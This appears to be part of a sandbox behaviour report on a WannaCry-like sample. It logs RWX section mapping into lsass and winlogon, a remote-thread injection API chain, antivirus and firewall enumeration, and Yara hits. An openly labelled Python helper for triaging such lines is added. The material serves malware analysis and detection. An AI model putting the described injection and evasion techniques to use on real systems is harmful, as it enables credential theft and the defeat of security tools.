              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\winlogon.exe protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\lsass.exe protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\dwm.exe protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Memory protected: unknown base: 774C9A50 protect: page execute and read and write
              Source: C:\Windows\mssecsvc.exe Memory protected: unknown base: 774C9830 protect: page execute and read and write
              Source: C:\Windows\mssecsvc.exe Memory protected: unknown base: 774CA040 protect: page execute and read and write
              Source: C:\Windows\mssecsvc.exe Memory protected: unknown base: 774C99D0 protect: page execute and read and write
              Source: C:\Windows\mssecsvc.exe Memory protected: unknown base: 774CA120 protect: page execute and read and write
              Source: C:\Windows\mssecsvc.exe Memory protected: unknown base: 774C9670 protect: page execute and read and write
              (the same six base addresses are re-protected to execute/read/write in a repeating cycle; 93 entries in total, collapsed above)
              Source: C:\Windows\mssecsvc.exe Thread created: unknown EIP: 7FFF3C38
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1
              Source: dwm.exe, 0000001A.00000000.336695207.0000026F1CEFF000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000001A.00000000.336693764.0000026F1CEFF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Manager
              Source: winlogon.exe, 00000009.00000000.279324344.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000000.268672318.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.791855601.000001593FF70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
              Source: winlogon.exe, 00000009.00000000.279324344.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000000.268672318.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.791855601.000001593FF70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
              Source: winlogon.exe, 00000009.00000000.279324344.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000000.268672318.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.791855601.000001593FF70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
              Source: winlogon.exe, 00000009.00000000.279324344.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000000.268672318.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.791855601.000001593FF70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
              Source: C:\Windows\System32\backgroundTaskHost.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280815\1658565894 VolumeInformation
              Source: C:\Windows\System32\backgroundTaskHost.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\1658565894 VolumeInformation
              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (6 entries)
              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (4 entries)
              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (3 entries)
              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation (2 entries)
              Source: C:\Windows\mssecsvc.exe Code function: 4_2_00AC388E GetSystemTime,Sleep,InternetGetConnectedState,gethostbyname,socket,ioctlsocket,connect,Sleep,closesocket
              Source: C:\Windows\mssecsvc.exe Code function: 4_2_00AC042D GetModuleHandleA,GetVersion,VirtualAlloc,FindCloseChangeNotification,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification
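              The behaviour evidence above is mostly the same three record shapes repeated many times: a named section mapped into another process with execute/read/write protection, a page in an unknown module re-protected to execute/read/write, and a code function whose import chain (CreateToolhelp32Snapshot, Process32First, Process32Next, OpenProcess, CreateRemoteThread) is the classic remote-thread injection pattern. The following triage helper is an added example written for this page; it is not part of the Joe Sandbox report and not the sandbox's own code. It parses lines of those three shapes, counts RWX section targets, flags mappings into high-value system processes, counts how often each base address is re-protected, and reports functions whose API list contains the injection chain in order. The sample lines are constructed to mirror the report's format, and the HIGH_VALUE_TARGETS set and INJECTION_CHAIN list are the editor's assumptions, not values from the report.

```python
"""Triage helper for sandbox behaviour lines of the shape seen in the report above.

Added example for this page; not part of the Joe Sandbox report. The sample
lines, the high-value process list and the injection API chain are assumptions
made for illustration.
"""
import re
from collections import Counter

# Constructed sample input mirroring the report's three record shapes.
SAMPLE_LINES = [
    r"Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and write",
    r"Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\lsass.exe protection: execute and read and write",
    r"Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\winlogon.exe protection: execute and read and write",
    r"Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\svchost.exe protection: execute and read and write",
    r"Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\svchost.exe protection: execute and read and write",
    r"Source: C:\Windows\mssecsvc.exe Memory protected: unknown base: 774C9A50 protect: page execute and read and write",
    r"Source: C:\Windows\mssecsvc.exe Memory protected: unknown base: 774C9830 protect: page execute and read and write",
    r"Source: C:\Windows\mssecsvc.exe Memory protected: unknown base: 774C9A50 protect: page execute and read and write",
    r"Source: C:\Windows\mssecsvc.exe Code function: 4_2_00AC042D GetModuleHandleA,GetVersion,VirtualAlloc,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,",
]

SECTION_RE = re.compile(
    r"^Source: (?P<src>\S+) Section loaded: (?P<obj>\S+) target: (?P<target>.+?) protection: (?P<prot>.+)$"
)
MEMPROT_RE = re.compile(
    r"^Source: (?P<src>\S+) Memory protected: (?P<mod>\S+) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+)$"
)
CODEFUNC_RE = re.compile(r"^Source: (?P<src>\S+) Code function: (?P<fn>\S+) (?P<apis>\S+)$")

# Assumption: processes that should never receive a third party's RWX section.
HIGH_VALUE_TARGETS = {"lsass.exe", "winlogon.exe", "csrss.exe", "services.exe"}

# Assumption: the remote-thread injection chain, in the order it must appear.
INJECTION_CHAIN = ["CreateToolhelp32Snapshot", "Process32First", "Process32Next",
                   "OpenProcess", "CreateRemoteThread"]


def is_rwx(prot: str) -> bool:
    """True when a protection string grants both execute and write."""
    p = prot.lower()
    return "execute" in p and "write" in p


def contains_ordered(seq, chain) -> bool:
    """True when every element of chain appears in seq, in that order (gaps allowed)."""
    it = iter(seq)
    return all(any(api == want for api in it) for want in chain)


def triage(lines):
    """Summarise cross-process RWX mappings, re-protections and injection chains."""
    summary = {
        "rwx_section_targets": Counter(),   # target process -> number of RWX sections
        "high_value_hits": [],              # (source, target, section object)
        "rwx_reprotect_bases": Counter(),   # base address -> times set to RWX
        "injection_chains": [],             # (source, function id)
    }
    for line in lines:
        m = SECTION_RE.match(line)
        if m:
            if is_rwx(m["prot"]):
                target = m["target"]
                summary["rwx_section_targets"][target] += 1
                if target.rsplit("\\", 1)[-1].lower() in HIGH_VALUE_TARGETS:
                    summary["high_value_hits"].append((m["src"], target, m["obj"]))
            continue
        m = MEMPROT_RE.match(line)
        if m:
            if is_rwx(m["prot"]):
                summary["rwx_reprotect_bases"][m["base"].upper()] += 1
            continue
        m = CODEFUNC_RE.match(line)
        if m:
            apis = [a for a in m["apis"].split(",") if a]
            if contains_ordered(apis, INJECTION_CHAIN):
                summary["injection_chains"].append((m["src"], m["fn"]))
    return summary


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for key, value in result.items():
        print(f"{key}: {value}")
```

              Run it over the evidence lines of a report (after the spacing has been restored between the "Source:" cell and the event text, as done above) to get the per-target counts instead of reading hundreds of identical rows; the high_value_hits list is the part worth escalating, since a section mapped with execute/read/write protection into lsass.exe or winlogon.exe is not something a benign installer does.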

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
              Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
              Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
              Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
              Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
              Source: svchost.exe, 00000021.00000000.357714821.00000219BF800000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.792446204.00000219BF800000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: "@C:\Program Files\Windows Defender\MsMpEng.exe
              Source: svchost.exe, 00000021.00000000.359843562.00000219BFE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.798662143.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@\device\harddiskvolume4\program files\windows defender\msmpeng.exe
              Source: svchost.exe, 00000021.00000000.359843562.00000219BFE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.798662143.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @\device\harddiskvolume4\program files\windows defender\msmpeng.exe
              Source: svchost.exe, 00000021.00000002.795574031.00000219BF950000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.358955359.00000219BF950000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@C:\Program Files\Windows Defender\MsMpEng.exe
              Source: svchost.exe, 00000021.00000002.795574031.00000219BF950000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.358955359.00000219BF950000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @C:\Program Files\Windows Defender\MsMpEng.exe
              Source: svchost.exe, 00000018.00000002.785371501.0000025477702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.783169601.0000025477613000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: mssecsvc.exe, mssecsvc.exe, 0000000C.00000000.275826042.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001F.00000000.342421890.0000000000410000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: 2\Device\HarddiskVolume2\Windows\ehome\mcupdate.exe
              Source: svchost.exe, 00000021.00000000.357714821.00000219BF800000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.792446204.00000219BF800000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &@C:\Program Files\Windows Defender\MsMpEng.exe
              Source: mssecsvc.exe Binary or memory string: 8\Device\HarddiskVolume2\Program Files\AVG\Av\avgcmgr.exe
              Source: svchost.exe, 00000018.00000002.784869379.0000025477656000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: *@V%ProgramFiles%\Windows Defender\MsMpeng.exe

              Stealing of Sensitive Information

Source: Yara match | File source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000022.00000002.780744908.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000000.354298451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.283723923.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000000.300112892.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.293535690.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.780713316.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.780672620.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.780673588.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.780855018.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.385443312.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000000.304308861.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.780898779.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.286148744.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.780822412.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.286120920.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.305699245.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.780747324.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.780744120.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.279124721.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.780746234.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000000.370652904.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.780744420.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.280498648.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.780866805.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.267576574.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.299868171.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.780745901.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.283773556.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.780830688.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.276526183.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000000.351839583.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.308100233.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.308123109.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.280480248.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.780705476.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.780673231.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000000.306044104.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.270705788.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.277208197.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.282602589.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.780927237.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000000.388511778.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.299802477.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.780822573.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.780747070.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000000.304252619.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.780873967.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.353602442.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000000.305864286.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.780673489.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.282588543.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.780935502.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.780755770.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000000.364362533.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000000.379109291.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.780921398.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.404533408.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.353517886.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.277226697.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.780728643.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000000.382043124.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.780747670.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000000.302993450.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.280846921.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.780892179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: mssecsvc.exe PID: 6360, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: winlogon.exe PID: 556, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: lsass.exe PID: 600, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mssecsvc.exe PID: 6636, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: fontdrvhost.exe PID: 684, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 704, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 756, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 804, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 856, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: fontdrvhost.exe PID: 900, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: dwm.exe PID: 964, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 280, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 328, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 384, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1080, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1092, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1156, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1264, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1312, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000022.00000002.780744908.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000000.354298451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.283723923.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000000.300112892.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.293535690.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.780713316.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.780672620.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.780673588.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.780855018.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.385443312.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000000.304308861.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.780898779.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.286148744.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.780822412.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.286120920.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.305699245.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.780747324.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.780744120.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.279124721.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.780746234.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000000.370652904.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.780744420.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.280498648.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.780866805.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.267576574.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.299868171.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.780745901.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.283773556.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.780830688.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.276526183.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
